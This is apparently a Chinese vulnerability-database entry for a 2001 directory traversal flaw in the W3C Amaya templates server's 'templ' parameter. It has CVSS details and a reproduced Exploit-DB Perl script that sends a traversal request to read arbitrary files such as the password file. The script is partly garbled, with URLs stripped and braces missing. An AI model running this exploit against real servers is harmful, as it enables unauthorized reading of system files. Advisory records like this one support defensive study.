发布时间 :2001-05-03 00:00:00
修订时间 :2008-09-05 16:23:42

[原文]Directory traversal vulnerability in in Anaya Web development server allows remote attackers to read arbitrary files via a .. (dot dot) attack in the templ parameter.

[CNNVD]W3C Amaya Templates Server sendtemp.pl远程目录遍历漏洞(CNNVD-200105-031)

        W3C的Amaya是一个所见即所得的Web浏览器和认证程序。它有一个叫做模板服务器的组件,可以从一个Apache Web服务器取得模板用在基于Amaya的认证。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

W3C Amaya Templates Server sendtemp.pl远程目录遍历漏洞
中危 未知
2001-05-03 00:00:00 2005-10-20 00:00:00
        W3C的Amaya是一个所见即所得的Web浏览器和认证程序。它有一个叫做模板服务器的组件,可以从一个Apache Web服务器取得模板用在基于Amaya的认证。

- 公告与补丁


- 漏洞信息 (289) Read Access to Files (EDBID:289)
cgi webapps
2001-03-04 Verified
0 Tom Parker
N/A [点击下载]
#!/usr/bin/perl -w

# A part of the Amaya Web development
# server contains a file disclosure  vulnerability, 
# which allows remote, read access to files 
# on the servers file system,  as whichever 
# user the httpd is running as.
# The Vulnerability is really quite simple..
# When the `templ` argument is past to
# it adds a link to the chosen stylesheet
# and a META field containing the publication's 
# URL of the new file to the chosen template.
# For example:
# http://localhost/cgi-bin/
# This is all well and good,  however.. 
# There is no sanity checking on the param you pass to the script..
# Ie: my $temp_file = param("templ");
# So by simply issuing a GET to:
# "http://localhost/cgi-bin/"
# The systems file system can be traversed and the passwd file can be read. 
# (Assuming the http daemon hasn't been run under chroot())
# Follows is a simple exploit.. however, its just as easy 
# to do this manually in your web browser.
# I really couldnt be bothered to format the output in any way,
# It only encourages script kiddies.
# Finally, "l33t hax0r greetz" to..
# ne0h, b0red, loophole, shad0w and the old dL crew..
# Scott, Jim, Mike.. All of the guys at Global Intersec.
# Tom Parker -
# MRX of HHP-Programming (
# Global InterSec INC California - Security Audits, Penetration testing, code auditing.

use IO::Socket;
print qq~
W3.ORG exploit by Tom Parker - tom\
    MRX of HHP-Programming (
	  -  Global InterSec INC California -
if((!defined($ARGV[0]))||(!defined($ARGV[1]))) { print "Usage\: \%filename\.pl \<hostname\> \<file-to-get\>\n"; exit 0; }
$SOCKET = IO::Socket::INET->new("$ARGV[0]:80");
print $SOCKET "GET /cgi-bin/$ARGV[1]\n";
print "Sent request for $ARGV[1] (http://$ARGV[0]/cgi-bin/\?templ\=$ARGV[1])\n";
while(<$SOCKET>) {
push @DATA, $_;

my $woot = join(' ',@DATA);
if($woot =~/$ARGV[1] wasn't found/) { print "$ARGV[1] dosnt seem to exist.\n"; exit 0; } 
else { print "@DATA"; }

# [2001-03-04]

- 漏洞信息

510 Anaya Web templ Variable Traveral Arbitrary File Access
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2001-02-12 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete